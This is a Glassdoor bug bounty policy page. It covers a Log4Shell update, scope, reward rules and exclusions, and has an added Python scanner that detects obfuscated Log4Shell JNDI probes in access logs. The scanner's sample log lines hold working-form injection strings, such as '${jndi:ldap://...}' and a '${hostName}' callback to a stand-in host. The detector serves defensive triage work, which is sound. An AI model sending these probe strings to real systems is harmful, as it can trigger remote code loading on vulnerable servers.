Glassdoor

2020-04-07
Glassdoor believes that working with skilled security researchers across the globe is crucial in providing a trusted and secure service to help people everywhere find jobs and companies they love.

If you believe you've identified a potential security issue in our product or service, we encourage you to notify us. We will investigate and do our best to promptly address the issue and keep you updated as we work to fix the bug you submitted.

12.13.2021 Log4Shell update:

Glassdoor patched most of the applications vulnerable to Log4Shell (CVE-2021-44228) on Friday and over the weekend. If you find any endpoints that are still vulnerable to Log4Shell (CVE-2021-44228), please report them to us; we will pay double our critical bounty, up to $5,000.

Detections in the form of pingbacks that include host information such as hostname or IP are acceptable and preferable. When you receive a pingback, include the IP address you tested from so we can triage your report faster.

12.14.2021 Log4Shell scope update:

help.glassdoor.com is out of scope for Log4Shell reports, as that system is hosted by a third-party vendor.
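Triaging a pingback report means matching the callback to the request that triggered it in the application's own access logs. The following is an added example, not Glassdoor's own tooling: a small Python scanner that URL-decodes and de-nests the lookup obfuscations commonly seen in Log4Shell probes (${lower:j}, ${::-j}, ${env:X:-j}), extracts the callback scheme and host, flags whether the lookup carries host information (for example ${hostName}, which is what makes a pingback attributable), and records the request's source IP so a reported testing IP can be matched against it. The access-log lines and the collaborator hostname oob.example.net are constructed for illustration.

```python
"""Find Log4Shell (CVE-2021-44228) probe strings in web access logs.

Added example for this page; not Glassdoor's tooling. The log lines and
the collaborator host oob.example.net below are constructed.
"""
import re
import urllib.parse
from dataclasses import dataclass

# An innermost ${...} lookup: no further braces inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# ${env:NAME:-default} style lookups. Log4j substitutes the default when
# NAME is unset, which is how probes hide the letters of "jndi".
_DEFAULT = re.compile(
    r"^(?:env|sys|sd|main|date|ctx|java|bundle|k8s|spring|docker|web|marker|log4j|event)"
    r":[^:]*:-(.*)$",
    re.I,
)
# The de-obfuscated lookup we care about; the host may itself embed a lookup.
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>(?:\$\{[^}]*\}|[^/:\s}])+)[^}]*\}",
    re.I,
)
# Lookups that make the callback carry host information.
_HOST_LEAK = re.compile(r"\$\{(?:hostName|env:[^}:]*|sys:[^}:]*|java:[^}:]*)\}", re.I)


@dataclass
class Finding:
    line_no: int
    src_ip: str          # first field of the access-log line
    scheme: str          # ldap, ldaps, rmi, dns, ...
    callback_host: str   # where the pingback would go
    leaks_host_info: bool
    lookup: str          # normalized lookup as matched


def _unwrap(m):
    """Resolve one innermost lookup the way Log4j 2.x would, or keep it."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if body.startswith("::-"):
        return body[3:]
    d = _DEFAULT.match(body)
    if d:
        return d.group(1)
    return m.group(0)  # jndi:, hostName, etc. stay in place


def normalize(text: str) -> str:
    """URL-decode (at most twice, for client plus proxy encoding) and peel
    nested lookups from the inside out until nothing changes."""
    for _ in range(2):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        peeled = _INNER.sub(_unwrap, text)
        if peeled == text:
            return text
        text = peeled


def scan(lines):
    """Return one Finding per JNDI lookup found in the given log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        for m in _JNDI.finditer(norm):
            findings.append(Finding(
                line_no=n,
                src_ip=line.split(" ", 1)[0],
                scheme=m.group("scheme").lower(),
                callback_host=m.group("host"),
                leaks_host_info=bool(_HOST_LEAK.search(m.group(0))),
                lookup=m.group(0),
            ))
    return findings


# Constructed Combined Log Format lines: one benign, one plain probe in the
# User-Agent, one URL-encoded and nested probe in a query string, one
# ${::-x} obfuscated probe using the rmi scheme.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:03:14:07 +0000] "GET /Job/index.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:03:14:09 +0000] "GET /Job/index.htm HTTP/1.1" 200 5120 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [12/Dec/2021:03:14:11 +0000] "GET /Search/results?keyword=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F%24%7BhostName%7D.oob.example.net%2Fa%7D HTTP/1.1" 200 4096 "-" "curl/7.79"',
    '198.51.100.9 - - [12/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 100 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://oob.example.net/x}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.src_ip} -> {f.scheme}://{f.callback_host}"
              f" host-info={f.leaks_host_info}")
```

Matching is done on the normalized string rather than on the raw line, so a detector that only greps for the literal `${jndi:` does not miss the nested and encoded forms; the `src_ip` field is what you would join against the IP a researcher reports with their pingback.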

Disclosure Policy:

  • Let us know as soon as possible upon discovery of a potential security issue, and we'll make every effort to quickly resolve the issue.

  • Provide us a reasonable amount of time to resolve the issue before any disclosure to the public or a third-party.

  • Make a good faith effort to avoid privacy violations, destruction of data, and interruption or degradation of our service. Only interact with accounts you own or with explicit permission of the account holder.

  • If you want to test some payloads, use our test companies such as Umbrella Corporation and/or Winkler Web Designs. Please don't test against other companies for which you do not have explicit permission.

Scope

Vulnerabilities must be within the http://www.glassdoor.com/ site, the Glassdoor Application Programming Interface (API), or one of the official Glassdoor mobile applications. Systems that we do not control (such as third-party sites) are excluded from the scope of the program.

  • https://www.glassdoor.com/

  • Glassdoor API

  • iOS and Android mobile apps

  • https://help.glassdoor.com/

Rewards

To show our appreciation of responsible security researchers, Glassdoor offers a monetary bounty for reports of qualifying security vulnerabilities. Reward amounts will vary based upon the severity of the reported vulnerability, and eligibility is at our sole discretion. Awards will be provided only to the first researcher to responsibly disclose the bug.

Submitting Vulnerability Reports:

In order to make triage of vulnerabilities as streamlined as possible, please provide as much detail as possible. We have created a simple template which will aid in the submission process:

Affected URL:

Affected Parameter:

Vulnerability Type: (see list below)

Steps to Reproduce/POC:

Screenshots/Video:

Browsers tested:

Potential Impact:

Details of exploitation scenarios:

Vulnerability Types:

  • Remote Code Execution

  • Memory Corruption

  • SQL Injection

  • Privilege Escalation

  • Command Injection

  • Authentication

  • Information Disclosure

  • XSS

  • Design Issue

  • Crypto Issue

  • CSRF

  • Unvalidated / Open Redirect

  • Clickjacking

  • Other (please detail)

Exclusions:

The following issues are outside the scope of our rewards program:

  • Denial of service

  • Any physical attempts against Glassdoor property or data centers

  • Password, email, and account policies, such as email verification, reset link expiration, and password complexity

  • Lack of CSRF tokens (unless there is evidence of actual, sensitive user action not protected by a token)

  • Login/logout CSRF

  • Cross-user/shared-CSRF token vulnerabilities that require shared cookies to be used as well (eg. gdid)

  • Attacks requiring physical access to a user's device

  • Missing security headers which do not lead directly to a vulnerability

  • Missing best practices

  • Self-XSS

  • XSS on any site other than Glassdoor.com and help.glassdoor.com

  • Host header injections unless you can show how they can lead to stealing user data.

  • Use of a known-vulnerable library (without evidence of exploitability)

  • Issues related to software or protocols not under Glassdoor control

  • Reports from automated tools or scans

  • Reports of spam (i.e., any report involving ability to send emails without rate limits)

  • Bypass of malware detection

  • Attacks that require attacker app to have the permission to overlay on top of our app (e.g., tapjacking)

  • Vulnerabilities affecting users of outdated browsers or platforms

  • Social engineering of Glassdoor employees or contractors

  • Presence of autocomplete attribute on web forms

  • Missing cookie flags on non-sensitive cookies

  • Reports of insecure SSL/TLS ciphers (unless you have a working proof of concept, and not just a report from a scanner)

  • Any report that discusses how you can learn whether a given username or email address has a Glassdoor account.

  • Any access to data where the targeted user needs to be operating a rooted mobile device.

  • Any report about DLL hijacking that does not demonstrate how it gains new privileges.

  • Cache Poisoning using X-Forwarded-Host on personal profile endpoints or without showing sufficient impact

  • Tab Nabbing or other rel="noopener" bugs

A sensitive operation includes (but is not limited to):

  1. Ability to access multiple users' PII without interaction.

  2. Ability to take over an account without the user's knowledge and/or interaction.

  3. Ability to manipulate our backend cloud services such that it puts our users' data at risk.

Notes on severity and PII:

  • The above severities are not set in stone: severities are subject to change and submissions are reviewed case by case, so an issue may be raised or lowered based on factors such as demonstrated impact.

  • PII consists of data that readily identifies an individual on the face of the data (e.g., a name, email address, phone number, national ID number). If the data exposed includes this type of data, all the data exposed with it is also considered PII. However, if facially identifiable data is not present in the exposure (i.e., a third party cannot identify who the data belongs to), the exposed data does not constitute PII as exposed, even if it would constitute PII within Glassdoor's systems because it is normally connected to facially identifiable data.

Rules:

  • Submit one vulnerability per report unless you need to chain those vulnerabilities to show higher impact.

  • Multiple vulnerabilities caused by one underlying issue will be awarded one bounty.

  • Please provide detailed reports with reproducible steps.

  • Don't DDoS or otherwise attack us in a way that would disrupt service for our customers, and don't leave any system in a more vulnerable state than you found it.

  • This means that you should not engage in testing or related activities that degrade, damage, or destroy information within our systems, or that may impact our users, such as denial of service, social engineering, or spam.

Legal Terms:

By participating in Glassdoor’s Bug Bounty program (the “Program”), you acknowledge that you have read and agree to Glassdoor’s Terms of Use as well as the following:

  • Your participation in the Program will not violate any law applicable to you, or disrupt or compromise any data that is not your own.

  • You are solely responsible for any applicable taxes and/or withholdings, arising from or relating to your participation in the Program, including from any bounty payments.

  • Glassdoor reserves the right to terminate or discontinue the Program at its discretion.

Thank you for helping keep Glassdoor and our users safe!

In Scope

Scope Type           Scope Name
android_application  com.glassdoor.app
ios_application      589698942
web_application      http://www.glassdoor.com/
web_application      http://api.glassdoor.com
web_application      https://help.glassdoor.com/

This program, crawled on 2020-04-07, is listed as a bounty program.

FireBounty © 2015-2024
